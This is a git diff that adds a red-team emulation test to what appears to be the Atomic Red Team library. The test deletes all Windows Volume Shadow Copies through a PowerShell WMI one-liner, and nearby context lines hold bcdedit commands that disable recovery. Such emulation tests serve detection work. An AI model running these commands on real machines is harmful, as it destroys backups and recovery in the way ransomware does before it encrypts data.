diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 0ca55270..4c9bfc81 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -19,6 +19,8 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #4 - Windows - Disable Windows Recovery Console Repair](#atomic-test-4---windows---disable-windows-recovery-console-repair)
+- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
+
@@ -101,4 +103,26 @@ bcdedit.exe /set {default} recoveryenabled no
+
+
+
+## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
+Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
+This technique is used by numerous ransomware families such as Sodinokibi/REvil.
+Executes Get-WMIObject
+
+**Supported Platforms:** Windows
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+```
+powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+```
+
+
+
+
+
+
diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index 3a12008f..0e3bc6f8 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -58,3 +58,18 @@ atomic_tests:
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
+- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
+ description: |
+ Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
+ This technique is used by numerous ransomware families such as Sodinokibi/REvil.
+ Executes Get-WMIObject
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+
diff --git a/atomics/index.md b/atomics/index.md
index 5c349fdd..c3007815 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -516,6 +516,7 @@
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
+ - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index de3626f5..de3c10af 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -16115,6 +16115,19 @@ impact:
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
+ - name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
+ description: "Deletes Windows Volume Shadow Copies with PowerShell code and
+ Get-WMIObject. \nThis technique is used by numerous ransomware families such
+ as Sodinokibi/REvil.\nExecutes Get-WMIObject \n"
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object
+ {$_.Delete();}"
+
+'
T1496:
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index f9a2c827..8434b0cc 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -378,6 +378,7 @@
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
+ - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)